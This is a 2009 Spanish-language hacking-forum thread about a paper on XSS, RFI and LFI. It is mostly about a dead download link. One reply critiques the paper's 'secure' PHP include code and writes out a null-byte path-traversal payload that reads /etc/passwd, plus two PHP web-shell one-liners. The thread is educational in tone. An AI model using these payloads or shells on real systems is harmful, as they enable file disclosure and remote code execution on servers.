elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 08:37  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, kamsky, TRICKY)
| | | |-+  Los viejos que todavia se ven By Zero Bits
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Los viejos que todavia se ven By Zero Bits  (Leído 1,197 veces)
Zero_Bits

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Los viejos que todavia se ven By Zero Bits
« en: 13 Junio 2009, 23:26 »

Los viejos que todavia se ven:

- XSS
- RFI
- LFI

Descargar
Autor: Zero Bits
Team: Venezuela [R00t] Team
« Última modificación: 14 Junio 2009, 17:15 por Zero_Bits » En línea
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.944


The Hacktivism is not a crime


Ver Perfil WWW
Re: Los viejos que todavia se ven By Zero Bits
« Respuesta #1 en: 14 Junio 2009, 04:25 »

Hola, el documento tiene harta info aunque me hibiera gustado que lo pusieras acá en ves de la descarga ya que sabes que a veces esas de rapidshare caducan etc etc, además todos podríamos leerla directamente.

Citar
Pondre un codigo 100% seguro contra rfi (Remote file inclusion):
$url = intval($_GET['url']); //la variable URL solo tendra un valor
entero
$archivo = "./documentos/cont".$url.".php"; //localizacion del archivo
if (file_exists($archivo)) include($archivo); // lo busca y si existe lo muestra

Hay veces en que los carácteres nulos nos juegan en contra y causan un bypass en este tipo de inclusiones, por ejemplo tgest.php?url=/../../../../etc/passwd%00 y el resto del buffer no es considerado dentro del include lanzando el lfi.

Citar
if (file_exists($archivo)) include($archivo);
fijate que las urls con ftp:// son considerados archivos por lo tanto file_exists e include los pasan por alto causando un bypass.

Citar
allow_url_fopen en OFF
Puede salvar un RFI pero no un LFI y tampoco una inclusión de shell si es que tienes acceso a una ejecución arbitraria:
Código
<?php eval(file_get_contents($_GET['shell'])); ?>
Código
<?php $x = fopen('c99.php', 'x'); fwrite($x, file_get_contents($_GET['shell'])); fclose($x); ?>

De todas formas es buén documento para el que quiera iniciarse en el tema sin mucho conocimiento.

Saludos.
En línea


seclogman

Desconectado Desconectado

Mensajes: 269


l0gbyte


Ver Perfil
Re: Los viejos que todavia se ven By Zero Bits
« Respuesta #2 en: 14 Junio 2009, 10:55 »

cierto, link caido. si no lo subes a una Acount collector, a las pocas descargas de dicho archivos rapidshare tira el link.




saludos
En línea





imoen


Desconectado Desconectado

Mensajes: 1.082


Ver Perfil
Re: Los viejos que todavia se ven By Zero Bits
« Respuesta #3 en: 14 Junio 2009, 12:47 »

Pon el doc en el for que el link no va thz
En línea

2 X Intel pentium III 1000 MHZ ( bi procesador )
2 gigas de Memoria value kigston pc 133 ( 4 X 512)
40 gigas de hd seagate ->> update 2 x 40 gigas 
ati 8500 64 mb DDR ->> update gforce 5200 FX 256

srta imoen
Zero_Bits

Desconectado Desconectado

Mensajes: 9



Ver Perfil
Re: Los viejos que todavia se ven By Zero Bits
« Respuesta #4 en: 14 Junio 2009, 17:16 »

Link cambiado ^^
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
alt+p alt+s funcionan todavia?
Sugerencias y dudas sobre el Foro
m0rf 6 406 Último mensaje 18 Enero 2012, 17:33
por m0rf
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines